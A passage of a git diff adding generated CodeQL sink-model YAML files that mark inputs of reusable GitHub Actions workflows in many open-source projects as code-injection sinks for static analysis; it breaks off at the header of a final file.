@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml new file mode 100644 index 000000000000..0538073273c8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml new file mode 100644 index 000000000000..d2d543b9cf80 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml new file mode 100644 index 000000000000..77c35145d4e4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml new file mode 100644 index 000000000000..68433b763418 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_folder", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml new file mode 100644 index 000000000000..c99b05845106 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml new file mode 100644 index 000000000000..bbdee0166f80 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goarch", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml new file mode 100644 index 000000000000..caccb0883390 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml 
@@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.full_arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.libraries", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml new file mode 100644 index 000000000000..f2172a5aaef8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml new file mode 100644 index 000000000000..59e33f0b6527 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "input.package_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml new file mode 100644 index 000000000000..ee54a015ebbb --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml new file mode 100644 index 000000000000..5e750a24f30b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml new file mode 100644 index 000000000000..5622dd89b573 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml new file mode 100644 index 000000000000..bd4406f24542 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] + - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml new file mode 100644 index 000000000000..748e317edff3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml new file mode 100644 index 000000000000..7bc475348144 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml new file mode 100644 index 000000000000..060025b349b3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.cmakeFlags", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "input.patchesUrl", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml new file mode 100644 index 000000000000..408d0b8b5240 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "input.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 000000000000..e24be2d0a21c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml new file mode 100644 index 000000000000..4e4140577982 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "input.image-base-name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml new file mode 100644 index 000000000000..60c109da3e3f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml new file mode 100644 index 000000000000..1ac813e5e7fc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.is_release", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml new file mode 100644 index 000000000000..13878976e43b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml new file mode 100644 index 000000000000..c66aff8690f7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml new file mode 100644 index 000000000000..b99f14b3c529 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml new file mode 100644 index 000000000000..aa7b4a1c9b81 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml new file mode 100644 index 000000000000..2689698d33b2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml new file mode 100644 index 000000000000..3c9e6718f915 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "input.version", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.arch", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml new file mode 100644 index 000000000000..a91b3ed66a43 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml new file mode 100644 index 000000000000..fcfee85a8dad --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "input.flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml new file mode 100644 index 000000000000..11d56b2b70b1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml new file mode 100644 index 000000000000..a824d844d866 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml new file mode 100644 index 000000000000..a7427768bbe3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] + - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml new file mode 100644 index 000000000000..505bb0cad074 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml new file mode 100644 index 000000000000..0899d449725e --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml new file mode 100644 index 000000000000..89a0ccfdb85f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml new file mode 100644 index 000000000000..053e863a5130 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.registry_target", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml new file mode 100644 index 000000000000..88d66d40826d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml new file mode 100644 index 000000000000..534936eab1f3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml new file mode 100644 index 000000000000..6d4259a45e52 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml new file mode 100644 index 000000000000..35d6bbd1b7bc --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.OS", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.version_override", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml new file mode 100644 index 000000000000..9dd893ca3b2a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml new file mode 100644 index 000000000000..10dfdc0c63ec --- /dev/null +++ 